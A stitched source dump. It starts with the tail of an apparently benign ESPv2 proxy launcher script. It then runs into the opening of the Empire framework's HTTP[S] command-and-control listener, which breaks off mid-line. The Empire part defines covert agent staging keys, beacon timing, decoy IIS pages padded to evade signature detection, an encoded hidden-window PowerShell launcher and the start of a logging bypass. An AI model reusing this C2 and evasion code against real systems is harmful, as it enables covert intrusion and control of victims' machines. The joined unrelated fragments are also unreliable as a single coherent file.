Only works when --cors_preset is in use. Configures the CORS header
Access-Control-Expose-Headers. Defaults to allow common response headers.
''')
parser.add_argument(
'--cors_allow_credentials',
action='store_true',
help='''
Only works when --cors_preset is in use. Enable the CORS header
Access-Control-Allow-Credentials. By default, this header is disabled.
''')
parser.add_argument(
'--check_metadata',
action='store_true',
help='''Enable fetching service name, service config ID and rollout
strategy from the metadata service.''')
parser.add_argument('--underscores_in_headers', action='store_true',
help='''Allow headers contain underscores to pass through. By default
ESPv2 rejects requests that have headers with underscores.''')
parser.add_argument(
'--envoy_use_remote_address',
action='store_true',
default=False,
help='''Envoy HttpConnectionManager configuration, please refer to envoy
documentation for detailed information.''')
parser.add_argument(
'--envoy_xff_num_trusted_hops',
default=None,
help='''Envoy HttpConnectionManager configuration, please refer to envoy
documentation for detailed information. The default value is 2 for
sidecar deployments and 0 for serverless deployments.''')
parser.add_argument(
'--log_request_headers',
default=None,
help='''Log corresponding request headers through
service control, separated by comma. Example, when
--log_request_headers=foo,bar, endpoint log will have
request_headers: foo=foo_value;bar=bar_value if values are available;
''')
parser.add_argument(
'--log_response_headers',
default=None,
help='''Log corresponding response headers through
service control, separated by comma. Example, when
--log_response_headers=foo,bar, endpoint log will have
response_headers: foo=foo_value;bar=bar_value if values are available;
''')
parser.add_argument(
'--log_jwt_payloads',
default=None,
help='''
Log corresponding JWT JSON payload primitive fields through service control,
separated by comma. Example, when --log_jwt_payload=sub,project_id, log
will have jwt_payload: sub=[SUBJECT];project_id=[PROJECT_ID]
if the fields are available. The value must be a primitive field,
JSON objects and arrays will not be logged.
''')
parser.add_argument(
'--service_control_network_fail_open',
default=True,
action='store_true',
help='''
In case of network failures when connecting to Google service control,
the requests will be allowed if this flag is on. The default is on.
''')
parser.add_argument(
'--jwks_cache_duration_in_s',
default=None,
help='''
Specify JWT public key cache duration in seconds. The default is 5 minutes.'''
)
parser.add_argument(
'--http_request_timeout_s',
default=None, type=int,
help='''
Set the timeout in seconds for all requests made to all external services
from ESPv2 (ie. Service Management, Instance Metadata Server, etc.).
This timeout does not apply to requests proxied to the backend.
Must be > 0 and the default is 30 seconds if not set.
''')
parser.add_argument(
'--service_control_check_timeout_ms',
default=None,
help='''
Set the timeout in millisecond for service control Check request.
Must be > 0 and the default is 1000 if not set. Default
''')
parser.add_argument(
'--service_control_quota_timeout_ms',
default=None,
help='''
Set the timeout in millisecond for service control Quota request.
Must be > 0 and the default is 1000 if not set.
''')
parser.add_argument(
'--service_control_report_timeout_ms',
default=None,
help='''
Set the timeout in millisecond for service control Report request.
Must be > 0 and the default is 2000 if not set.
''')
parser.add_argument(
'--service_control_check_retries',
default=None,
help='''
Set the retry times for service control Check request.
Must be >= 0 and the default is 3 if not set.
''')
parser.add_argument(
'--service_control_quota_retries',
default=None,
help='''
Set the retry times for service control Quota request.
Must be >= 0 and the default is 1 if not set.
''')
parser.add_argument(
'--service_control_report_retries',
default=None,
help='''
Set the retry times for service control Report request.
Must be >= 0 and the default is 5 if not set.
''')
parser.add_argument(
'--access_log',
help='''
Path to a local file to which the access log entries will be written.
'''
)
parser.add_argument(
'--access_log_format',
help='''
String format to specify the format of access log. If unset, the
following format will be used.
https://www.envoyproxy.io/docs/envoy/latest/configuration/observability/access_log#default-format-string
For the detailed format grammar, please refer to the following document.
https://www.envoyproxy.io/docs/envoy/latest/configuration/observability/access_log#format-strings
'''
)
parser.add_argument(
'--disable_tracing',
action='store_true',
default=False,
help='''
Disable Stackdriver tracing. By default, tracing is enabled with 1 out
of 1000 requests being sampled. This sampling rate can be changed with
the --tracing_sample_rate flag.
'''
)
parser.add_argument(
'--tracing_project_id',
default="",
help="The Google project id for Stack driver tracing")
parser.add_argument(
'--tracing_sample_rate',
help='''
Tracing sampling rate from 0.0 to 1.0.
By default, 1 out of 1000 requests are sampled.
Cloud trace can still be enabled from request HTTP headers with
trace context regardless this flag value.
'''
)
parser.add_argument(
'--disable_cloud_trace_auto_sampling',
action='store_true',
default=False,
help="An alias to override --tracing_sample_rate to 0")
parser.add_argument(
'--tracing_incoming_context',
default="",
help='''
comma separated incoming trace contexts (traceparent|grpc-trace-bin|x-cloud-trace-context)'''
)
parser.add_argument(
'--tracing_outgoing_context',
default="",
help='''
comma separated outgoing trace contexts (traceparent|grpc-trace-bin|x-cloud-trace-context)'''
)
parser.add_argument(
'--cloud_trace_url_override',
default="",
help='''
By default, traces will be sent to production Stackdriver Tracing.
If this is non-empty, ESPv2 will send traces to this gRPC service instead.
The url must be in gRPC format.
https://github.com/grpc/grpc/blob/master/doc/naming.md
The gRPC service must implement the cloud trace v2 RPCs.
https://github.com/googleapis/googleapis/tree/master/google/devtools/cloudtrace/v2
'''
)
parser.add_argument(
'--non_gcp',
action='store_true',
default=False,
help='''
By default, the proxy tries to talk to GCP metadata server to get VM
location in the first few requests. Setting this flag to true to skip
this step.
''')
parser.add_argument(
'--service_account_key',
help='''
Use the service account key JSON file to access the service control and the
service management. You can also set {creds_key} environment variable to
the location of the service account credentials JSON file. If the option is
omitted, the proxy contacts the metadata service to fetch an access token.
'''.format(creds_key=GOOGLE_CREDS_KEY))
parser.add_argument(
'--dns_resolver_addresses',
help='''
The addresses of dns resolvers. Each address should be in format of
IP_ADDR or IP_ADDR:PORT and they are separated by ';'. For the IP_ADDR
case, the default DNS port 52 will be used. (e.g.,
--dns_resolver_addresses=127.0.0.1;127.0.0.2;127.0.0.3:8000)
If unset, will use the default resolver configured in /etc/resolv.conf.
''')
parser.add_argument(
'--backend_dns_lookup_family',
default=None,
choices=['auto', 'v4only', 'v6only'],
help='''
Define the dns lookup family for all backends. The options are "auto", "v4only" and "v6only". The default is "auto".
''')
parser.add_argument('--enable_debug', action='store_true', default=False,
help='''
Enables a variety of debug features in both Config Manager and Envoy, such as:
- Debug level per-request application logs in Envoy
- Debug level service configuration logs in Config Manager
- Debug HTTP response headers
''')
parser.add_argument(
'--transcoding_always_print_primitive_fields',
action='store_true', help='''Whether to always print primitive fields
for grpc-json transcoding. By default primitive fields with default
values will be omitted in JSON output. For example, an int32 field set
to 0 will be omitted. Setting this flag to true will override the
default behavior and print primitive fields regardless of their values.
Defaults to false
''')
parser.add_argument(
'--transcoding_always_print_enums_as_ints', action='store_true',
help='''Whether to always print enums as ints for grpc-json transcoding.
By default they are rendered as strings. Defaults to false.''')
parser.add_argument(
'--transcoding_preserve_proto_field_names', action='store_true',
help='''Whether to preserve proto field names for grpc-json transcoding.
By default protobuf will generate JSON field names using the json_name
option, or lower camel case, in that order. Setting this flag will
preserve the original field names. Defaults to false''')
parser.add_argument(
'--transcoding_ignore_query_parameters', action=None,
help='''
A list of query parameters(separated by comma) to be ignored for
transcoding method mapping in grpc-json transcoding. By default, the
transcoder filter will not transcode a request if there are any
unknown/invalid query parameters.
''')
parser.add_argument(
'--transcoding_ignore_unknown_query_parameters', action='store_true',
help='''
Whether to ignore query parameters that cannot be mapped to a
corresponding protobuf field in grpc-json transcoding. Use this if you
cannot control the query parameters and do not know them beforehand.
Otherwise use ignored_query_parameters. Defaults to false.
''')
# Start Deprecated Flags Section
parser.add_argument(
'--enable_backend_routing',
action='store_true',
default=False,
help='''
===
DEPRECATED: This flag will automatically be enabled if needed, so it
does NOT need to be set manually.
===
Enable ESPv2 to route requests according to the
"x-google-backend" or "backend" configuration
''')
parser.add_argument(
'--backend_protocol',
default=None,
help='''
===
DEPRECATED: This flag will automatically be set based on the scheme
specified in the --backend flag. Overrides are no longer needed.
===
Backend Protocol. Overrides the protocol in --backend.
Choices: [http1|http2|grpc].
Default value: http1.''',
choices=['http1', 'http2', 'grpc'])
parser.add_argument('--http_port', default=None, type=int, help='''
This flag is exactly same as --listener_port. It is added for
backward compatible for ESPv1 and will be deprecated.
Please use the flag --listener_port.''')
parser.add_argument('--http2_port', default=None, type=int, help='''
This flag is exactly same as --listener_port. It is added for
backward compatible for ESPv1 and will be deprecated.
Please use the flag --listener_port.''')
parser.add_argument('--ssl_port', default=None, type=int, help='''
This flag added for backward compatible for ESPv1 and will be deprecated.
Please use the flags --listener_port and --ssl_server_cert_path instead.
When configured, ESPv2 accepts HTTP/1.x and HTTP/2 secure connections on this port,
Requires the certificate and key files /etc/nginx/ssl/nginx.crt and
/etc/nginx/ssl/nginx.key''')
parser.add_argument('--dns', help='''
This flag is exactly same as --dns_resolver_addresses. This flag is added
for backward compatible for ESPv1 and will be deprecated.
Please use the flag --dns_resolver_addresses instead.''')
parser.add_argument('-t', '--tls_mutual_auth', action='store_true', help='''
This flag added for backward compatible for ESPv1 and will be deprecated.
Please use the flag --ssl_backend_client_cert_path instead.
Enable TLS mutual authentication for HTTPS backends.
Default value: Not enabled. Please provide the certificate and key files
/etc/nginx/ssl/backend.crt and /etc/nginx/ssl/backend.key.''')
parser.add_argument('--ssl_protocols',
default=None, action='append', help='''
This flag added for backward compatible for ESPv1 and will be deprecated.
Please use the flag --ssl_minimum_protocol and --ssl_maximum_protocol
instead.
Enable the specified SSL protocols. Please refer to
https://nginx.org/en/docs/http/ngx_http_ssl_module.html#ssl_protocols.
The "ssl_protocols" argument can be repeated multiple times to specify multiple
SSL protocols (e.g., --ssl_protocols=TLSv1.1 --ssl_protocols=TLSv1.2).
''')
parser.add_argument('--enable_grpc_backend_ssl',
action='store_true', help='''
This flag added for backward compatible for ESPv1 and will be deprecated.
Enable SSL for gRPC backend. ESPv2 auto enables SSL if schema `grpcs` is
detected.''')
parser.add_argument('--grpc_backend_ssl_root_certs_file',
default='/etc/nginx/trusted-ca-certificates.crt',
help='''This flag added for backward compatible for ESPv1 and will be deprecated.
ESPv2 uses `/etc/ssl/certs/ca-certificates.crt` by default.
The file path for gRPC backend SSL root certificates.''')
parser.add_argument('--ssl_client_cert_path', default=None, help='''
This flag is renamed and deprecated for clarity.
Use `--ssl_backend_client_cert_path` instead.''')
parser.add_argument('--ssl_client_root_certs_file', default=None, help='''
This flag is renamed and deprecated for clarity.
Use `--ssl_backend_client_root_certs_file` instead.''')
# End Deprecated Flags Section
# Start internal flags section
parser.add_argument(
'--on_serverless',
action='store_true',
default=False,
help='''
When ESPv2 is started via the serverless image, this is true.
''')
# End internal flags section
return parser
# Check whether there are conflict flags. If so, return the error string.
# Otherwise returns None. This function also changes some default flag value.
def enforce_conflict_args(args):
if args.rollout_strategy:
if args.rollout_strategy != DEFAULT_ROLLOUT_STRATEGY:
if args.version:
return "Flag --version cannot be used together with -R or --rollout_strategy."
if args.service_json_path:
return "Flag -R or --rollout_strategy must be fixed with --service_json_path."
if args.service_json_path:
if args.service:
return "Flag --service cannot be used together with --service_json_path."
if args.version:
return "Flag --version cannot be used together with --service_json_path."
if args.non_gcp:
if args.service_account_key is None and GOOGLE_CREDS_KEY not in os.environ:
return "If --non_gcp is specified, --service_account_key has to be specified, or GOOGLE_APPLICATION_CREDENTIALS has to set in os.environ."
if not args.tracing_project_id:
# for non gcp case, disable tracing if tracing project id is not provided.
args.disable_tracing = True
if not args.access_log and args.access_log_format:
return "Flag --access_log_format has to be used together with --access_log."
if args.ssl_port and args.ssl_server_cert_path:
return "Flag --ssl_port is going to be deprecated, please use --ssl_server_cert_path only."
if args.tls_mutual_auth and (args.ssl_backend_client_cert_path or args.ssl_client_cert_path):
return "Flag --tls_mutual_auth is going to be deprecated, please use --ssl_backend_client_cert_path only."
if (args.ssl_backend_client_root_certs_file or args.ssl_client_root_certs_file) and args.enable_grpc_backend_ssl:
return "Flag --enable_grpc_backend_ssl are going to be deprecated, please use --ssl_backend_client_root_certs_file only."
if args.generate_self_signed_cert and args.ssl_server_cert_path:
return "Flag --generate_self_signed_cert and --ssl_server_cert_path cannot be used simutaneously."
port_flags = []
port_num = DEFAULT_LISTENER_PORT
if args.http_port:
port_flags.append("--http_port")
port_num = args.http_port
if args.http2_port:
port_flags.append("--http2_port")
port_num = args.http2_port
if args.listener_port:
port_flags.append("--listener_port")
port_num = args.listener_port
if args.ssl_port:
port_flags.append("--ssl_port")
port_num = args.ssl_port
if len(port_flags) > 1:
return "Multiple port flags {} are not allowed, use only the --listener_port flag".format(",".join(port_flags))
elif port_num < 1024:
return "Port {} is a privileged port. " \
"For security purposes, the ESPv2 container cannot bind to it. " \
"Use any port above 1024 instead.".format(port_num)
if args.ssl_protocols and (args.ssl_minimum_protocol or args.ssl_maximum_protocol):
return "Flag --ssl_protocols is going to be deprecated, please use --ssl_minimum_protocol and --ssl_maximum_protocol."
if args.transcoding_ignore_query_parameters \
and args.transcoding_ignore_unknown_query_parameters:
return "Flag --transcoding_ignore_query_parameters cannot be used" \
" together with --transcoding_ignore_unknown_query_parameters."
if args.dns_resolver_addresses and args.dns:
return "Flag --dns_resolver_addresses cannot be used together with" \
" together with --dns."
if args.ssl_backend_client_cert_path and args.ssl_client_cert_path:
return "Flag --ssl_client_cert_path is renamed to " \
"--ssl_backend_client_cert_path, only use the latter flag."
if args.ssl_backend_client_root_certs_file and args.ssl_client_root_certs_file:
return "Flag --ssl_client_root_certs_file is renamed to " \
"--ssl_backend_client_root_certs_file, only use the latter flag."
return None
def gen_proxy_config(args):
check_conflict_result = enforce_conflict_args(args)
if check_conflict_result:
logging.error(check_conflict_result)
sys.exit(1)
proxy_conf = [
CONFIGMANAGER_BIN,
"--logtostderr",
"--rollout_strategy", args.rollout_strategy,
]
if "://" not in args.backend:
proxy_conf.extend(["--backend_address", "http://" + args.backend])
else:
proxy_conf.extend(["--backend_address", args.backend])
if args.healthz:
proxy_conf.extend(["--healthz", args.healthz])
if args.enable_debug:
proxy_conf.extend(["--v", "1"])
else:
proxy_conf.extend(["--v", "0"])
if args.envoy_xff_num_trusted_hops:
proxy_conf.extend(["--envoy_xff_num_trusted_hops",
args.envoy_xff_num_trusted_hops])
elif args.on_serverless:
proxy_conf.extend(["--envoy_xff_num_trusted_hops",
'{}'.format(SERVERLESS_XFF_NUM_TRUSTED_HOPS)])
if args.jwks_cache_duration_in_s:
proxy_conf.extend(["--jwks_cache_duration_in_s", args.jwks_cache_duration_in_s])
if args.management:
proxy_conf.extend(["--service_management_url", args.management])
if args.log_request_headers:
proxy_conf.extend(["--log_request_headers", args.log_request_headers])
if args.log_response_headers:
proxy_conf.extend(["--log_response_headers", args.log_response_headers])
if args.log_jwt_payloads:
proxy_conf.extend(["--log_jwt_payloads", args.log_jwt_payloads])
if args.http_port:
proxy_conf.extend(["--listener_port", str(args.http_port)])
if args.http2_port:
proxy_conf.extend(["--listener_port", str(args.http2_port)])
if args.listener_port:
proxy_conf.extend(["--listener_port", str(args.listener_port)])
if args.ssl_server_cert_path:
proxy_conf.extend(["--ssl_server_cert_path", str(args.ssl_server_cert_path)])
if args.ssl_port:
proxy_conf.extend(["--ssl_server_cert_path", "/etc/nginx/ssl"])
proxy_conf.extend(["--listener_port", str(args.ssl_port)])
if args.ssl_backend_client_cert_path:
proxy_conf.extend(["--ssl_backend_client_cert_path", str(args.ssl_backend_client_cert_path)])
if args.ssl_client_cert_path:
proxy_conf.extend(["--ssl_backend_client_cert_path", str(args.ssl_client_cert_path)])
if args.enable_grpc_backend_ssl and args.grpc_backend_ssl_root_certs_file:
proxy_conf.extend(["--ssl_backend_client_root_certs_path", str(args.grpc_backend_ssl_root_certs_file)])
if args.ssl_backend_client_root_certs_file:
proxy_conf.extend(["--ssl_backend_client_root_certs_path", str(args.ssl_backend_client_root_certs_file)])
if args.ssl_client_root_certs_file:
proxy_conf.extend(["--ssl_backend_client_root_certs_path", str(args.ssl_client_root_certs_file)])
if args.tls_mutual_auth:
proxy_conf.extend(["--ssl_backend_client_cert_path", "/etc/nginx/ssl"])
if args.ssl_minimum_protocol:
proxy_conf.extend(["--ssl_minimum_protocol", args.ssl_minimum_protocol])
if args.ssl_maximum_protocol:
proxy_conf.extend(["--ssl_maximum_protocol", args.ssl_maximum_protocol])
if args.ssl_protocols:
args.ssl_protocols.sort()
proxy_conf.extend(["--ssl_minimum_protocol", args.ssl_protocols[0]])
proxy_conf.extend(["--ssl_maximum_protocol", args.ssl_protocols[-1]])
# Generate self-signed cert if needed
if args.generate_self_signed_cert:
if not os.path.exists("/tmp/ssl/endpoints"):
os.makedirs("/tmp/ssl/endpoints")
logging.info("Generating self-signed certificate...")
os.system(("openssl req -x509 -newkey rsa:2048"
" -keyout /tmp/ssl/endpoints/server.key -nodes"
" -out /tmp/ssl/endpoints/server.crt"
' -days 3650 -subj "/CN=localhost"'))
proxy_conf.extend(["--ssl_server_cert_path", "/tmp/ssl/endpoints"])
if args.enable_strict_transport_security:
proxy_conf.append("--enable_strict_transport_security")
if args.service:
proxy_conf.extend(["--service", args.service])
if args.http_request_timeout_s:
proxy_conf.extend( ["--http_request_timeout_s", str(args.http_request_timeout_s)])
if args.service_control_check_retries:
proxy_conf.extend([
"--service_control_check_retries",
args.service_control_check_retries
])
if args.service_control_quota_retries:
proxy_conf.extend([
"--service_control_quota_retries",
args.service_control_quota_retries
])
if args.service_control_report_retries:
proxy_conf.extend([
"--service_control_report_retries",
args.service_control_report_retries
])
if args.service_control_check_timeout_ms:
proxy_conf.extend([
"--service_control_check_timeout_ms",
args.service_control_check_timeout_ms
])
if args.service_control_quota_timeout_ms:
proxy_conf.extend([
"--service_control_quota_timeout_ms",
args.service_control_quota_timeout_ms
])
if args.service_control_report_timeout_ms:
proxy_conf.extend([
"--service_control_report_timeout_ms",
args.service_control_report_timeout_ms
])
# NOTE: It is true by default in configmangager's flags.
if not args.service_control_network_fail_open:
proxy_conf.extend(["--service_control_network_fail_open=false"])
if args.version:
proxy_conf.extend(["--service_config_id", args.version])
if args.service_json_path:
proxy_conf.extend(["--service_json_path", args.service_json_path])
if args.check_metadata:
proxy_conf.append("--check_metadata")
if args.underscores_in_headers:
proxy_conf.append("--underscores_in_headers")
if args.access_log:
proxy_conf.extend(["--access_log",
args.access_log])
if args.access_log_format:
proxy_conf.extend(["--access_log_format",
args.access_log_format])
if args.disable_tracing:
proxy_conf.append("--disable_tracing")
else:
if args.tracing_project_id:
proxy_conf.extend(["--tracing_project_id", args.tracing_project_id])
if args.tracing_incoming_context:
proxy_conf.extend(
["--tracing_incoming_context", args.tracing_incoming_context])
if args.tracing_outgoing_context:
proxy_conf.extend(
["--tracing_outgoing_context", args.tracing_outgoing_context])
if args.cloud_trace_url_override:
proxy_conf.extend(["--tracing_stackdriver_address",
args.cloud_trace_url_override])
if args.disable_cloud_trace_auto_sampling:
proxy_conf.extend(["--tracing_sample_rate", "0"])
elif args.tracing_sample_rate:
proxy_conf.extend(["--tracing_sample_rate",
str(args.tracing_sample_rate)])
if args.transcoding_always_print_primitive_fields:
proxy_conf.append("--transcoding_always_print_primitive_fields")
if args.transcoding_always_print_enums_as_ints:
proxy_conf.append("--transcoding_always_print_enums_as_ints")
if args.transcoding_preserve_proto_field_names:
proxy_conf.append("--transcoding_preserve_proto_field_names")
if args.transcoding_ignore_query_parameters:
proxy_conf.extend(["--transcoding_ignore_query_parameters",
args.transcoding_ignore_query_parameters])
if args.transcoding_ignore_unknown_query_parameters:
proxy_conf.append("--transcoding_ignore_unknown_query_parameters")
if args.on_serverless:
proxy_conf.extend([
"--compute_platform_override", SERVERLESS_PLATFORM])
if args.backend_dns_lookup_family:
proxy_conf.extend(
["--backend_dns_lookup_family", args.backend_dns_lookup_family])
if args.dns_resolver_addresses:
proxy_conf.extend(
["--dns_resolver_addresses", args.dns_resolver_addresses])
if args.dns:
proxy_conf.extend(
["--dns_resolver_addresses", args.dns]
)
if args.envoy_use_remote_address:
proxy_conf.append("--envoy_use_remote_address")
if args.cors_preset:
proxy_conf.extend([
"--cors_preset",
args.cors_preset,
"--cors_allow_origin",
args.cors_allow_origin,
"--cors_allow_origin_regex",
args.cors_allow_origin_regex,
"--cors_allow_methods",
args.cors_allow_methods,
"--cors_allow_headers",
args.cors_allow_headers,
"--cors_expose_headers",
args.cors_expose_headers,
])
if args.cors_allow_credentials:
proxy_conf.append("--cors_allow_credentials")
# Set credentials file from the environment variable
if args.service_account_key is None and GOOGLE_CREDS_KEY in os.environ:
args.service_account_key = os.environ[GOOGLE_CREDS_KEY]
if args.service_account_key:
proxy_conf.extend(["--service_account_key", args.service_account_key])
if args.non_gcp:
proxy_conf.append("--non_gcp")
if args.enable_debug:
proxy_conf.append("--suppress_envoy_headers=false")
return proxy_conf
def gen_envoy_args(args):
cmd = [ENVOY_BIN, "-c", DEFAULT_CONFIG_DIR + BOOTSTRAP_CONFIG,
"--disable-hot-restart",
# This will print logs in `glog` format.
# Stackdriver logging integrates nicely with this format.
"--log-format %L%m%d %T.%e %t envoy] [%t][%n]%v",
"--log-format-escaped"]
if args.enable_debug:
# Enable debug logging, but not for everything... too noisy otherwise.
cmd.append("-l debug")
cmd.append("--component-log-level upstream:info,main:info")
return cmd
def output_reader(proc):
for line in iter(proc.stdout.readline, b''):
sys.stdout.write(line.decode())
def start_config_manager(proxy_conf):
print("Starting Config Manager with args: {}".format(proxy_conf))
proc = subprocess.Popen(proxy_conf,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
t = threading.Thread(target=output_reader, args=(proc,))
t.start()
return proc
def start_envoy(args):
subprocess.call(gen_bootstrap_conf(args))
cmd = gen_envoy_args(args)
print("Starting Envoy with args: {}".format(cmd))
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
t = threading.Thread(target=output_reader, args=(proc,))
t.start()
return proc
if __name__ == '__main__':
logging.basicConfig(format='%(levelname)s: %(message)s', level=logging.INFO)
parser = make_argparser()
args = parser.parse_args()
cm_proc = start_config_manager(gen_proxy_config(args))
envoy_proc = start_envoy(args)
while True:
time.sleep(HEALTH_CHECK_PERIOD)
if not cm_proc or cm_proc.poll():
logging.fatal("Config Manager is down, killing all processes.")
if envoy_proc:
os.kill(envoy_proc.pid, signal.SIGKILL)
sys.exit(1)
if not envoy_proc or envoy_proc.poll():
logging.fatal("Envoy is down, killing all processes.")
if cm_proc:
os.kill(cm_proc.pid, signal.SIGKILL)
sys.exit(1)
|
http.py
|
import logging
import base64
import sys
import random
import string
import os
import ssl
import time
import copy
import json
import sys
from pydispatch import dispatcher
from flask import Flask, request, make_response, send_from_directory
# Empire imports
from lib.common import helpers
from lib.common import agents
from lib.common import encryption
from lib.common import packets
from lib.common import messages
from lib.common import templating
from lib.common import obfuscation
class Listener:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'HTTP[S]',
'Author': ['@harmj0y'],
'Description': ('Starts a http[s] listener (PowerShell or Python) that uses a GET/POST approach.'),
'Category' : ('client_server'),
'Comments': []
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Name' : {
'Description' : 'Name for the listener.',
'Required' : True,
'Value' : 'http'
},
'Host' : {
'Description' : 'Hostname/IP for staging.',
'Required' : True,
'Value' : "http://%s" % (helpers.lhost())
},
'BindIP' : {
'Description' : 'The IP to bind to on the control server.',
'Required' : True,
'Value' : '0.0.0.0'
},
'Port' : {
'Description' : 'Port for the listener.',
'Required' : True,
'Value' : ''
},
'Launcher' : {
'Description' : 'Launcher string.',
'Required' : True,
'Value' : 'powershell -noP -sta -w 1 -enc '
},
'StagingKey' : {
'Description' : 'Staging key for initial agent negotiation.',
'Required' : True,
'Value' : '2c103f2c4ed1e59c0b4e2e01821770fa'
},
'DefaultDelay' : {
'Description' : 'Agent delay/reach back interval (in seconds).',
'Required' : True,
'Value' : 5
},
'DefaultJitter' : {
'Description' : 'Jitter in agent reachback interval (0.0-1.0).',
'Required' : True,
'Value' : 0.0
},
'DefaultLostLimit' : {
'Description' : 'Number of missed checkins before exiting',
'Required' : True,
'Value' : 60
},
'DefaultProfile' : {
'Description' : 'Default communication profile for the agent.',
'Required' : True,
'Value' : "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
},
'CertPath' : {
'Description' : 'Certificate path for https listeners.',
'Required' : False,
'Value' : ''
},
'KillDate' : {
'Description' : 'Date for the listener to exit (MM/dd/yyyy).',
'Required' : False,
'Value' : ''
},
'WorkingHours' : {
'Description' : 'Hours for the agent to operate (09:00-17:00).',
'Required' : False,
'Value' : ''
},
'Headers' : {
'Description' : 'Headers for the control server.',
'Required' : True,
'Value' : 'Server:Microsoft-IIS/7.5'
},
'Cookie' : {
'Description' : 'Custom Cookie Name',
'Required' : False,
'Value' : ''
},
'StagerURI' : {
'Description' : 'URI for the stager. Must use /download/. Example: /download/stager.php',
'Required' : False,
'Value' : ''
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'SlackToken' : {
'Description' : 'Your SlackBot API token to communicate with your Slack instance.',
'Required' : False,
'Value' : ''
},
'SlackChannel' : {
'Description' : 'The Slack channel or DM that notifications will be sent to.',
'Required' : False,
'Value' : '#general'
}
}
# required:
self.mainMenu = mainMenu
self.threads = {}
# optional/specific for this module
self.app = None
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
# set the default staging key to the controller db default
self.options['StagingKey']['Value'] = str(helpers.get_config('staging_key')[0])
# randomize the length of the default_response and index_page headers to evade signature based scans
self.header_offset = random.randint(0, 64)
self.session_cookie = ''
# check if the current session cookie not empty and then generate random cookie
if self.session_cookie == '':
self.options['Cookie']['Value'] = self.generate_cookie()
def default_response(self):
"""
Returns an IIS 7.5 404 not found page.
"""
return '\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>',
'<title>404 - File or directory not found.</title>',
'<style type="text/css">',
'<!--',
'body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}',
'fieldset{padding:0 15px 10px 15px;}',
'h1{font-size:2.4em;margin:0;color:#FFF;}',
'h2{font-size:1.7em;margin:0;color:#CC0000;}',
'h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}',
'#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;',
'background-color:#555555;}',
'#content{margin:0 0 0 2%;position:relative;}',
'.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="header"><h1>Server Error</h1></div>',
'<div id="content">',
' <div class="content-container"><fieldset>',
' <h2>404 - File or directory not found.</h2>',
' <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>',
' </fieldset></div>',
'</div>',
'</body>',
'</html>',
' ' * self.header_offset, # randomize the length of the header to evade signature based detection
])
def index_page(self):
"""
Returns a default HTTP server page.
"""
return '\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />',
'<title>IIS7</title>',
'<style type="text/css">',
'<!--',
'body {',
' color:#000000;',
' background-color:#B3B3B3;',
' margin:0;',
'}',
'',
'#container {',
' margin-left:auto;',
' margin-right:auto;',
' text-align:center;',
' }',
'',
'a img {',
' border:none;',
'}',
'',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="container">',
'<a href="http://go.microsoft.com/fwlink/?linkid=66138&clcid=0x409"><img src="welcome.png" alt="IIS7" width="571" height="411" /></a>',
'</div>',
'</body>',
'</html>',
])
def validate_options(self):
"""
Validate all options for this listener.
"""
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
for key in self.options:
if self.options[key]['Required'] and (str(self.options[key]['Value']).strip() == ''):
print helpers.color("[!] Option \"%s\" is required." % (key))
return False
# If we've selected an HTTPS listener without specifying CertPath, let us know.
if self.options['Host']['Value'].startswith('https') and self.options['CertPath']['Value'] == '':
print helpers.color("[!] HTTPS selected but no CertPath specified.")
return False
return True
def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default', proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='', listenerName=None):
"""
Generate a basic launcher for the specified listener.
"""
if not language:
print helpers.color('[!] listeners/http generate_launcher(): no language specified!')
if listenerName and (listenerName in self.threads) and (listenerName in self.mainMenu.listeners.activeListeners):
# extract the set options for this instantiated listener
listenerOptions = self.mainMenu.listeners.activeListeners[listenerName]['options']
host = listenerOptions['Host']['Value']
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
profile = listenerOptions['DefaultProfile']['Value']
uris = [a for a in profile.split('|')[0].split(',')]
stage0 = random.choice(uris)
customHeaders = profile.split('|')[2:]
cookie = listenerOptions['Cookie']['Value']
# generate new cookie if the current session cookie is empty to avoid empty cookie if create multiple listeners
if cookie == '':
generate = self.generate_cookie()
listenerOptions['Cookie']['Value'] = generate
cookie = generate
if language.startswith('po'):
# PowerShell
stager = '$ErrorActionPreference = \"SilentlyContinue\";'
if safeChecks.lower() == 'true':
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
# ScriptBlock Logging bypass
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("GPF")+"=[ref].Assembly.GetType(")
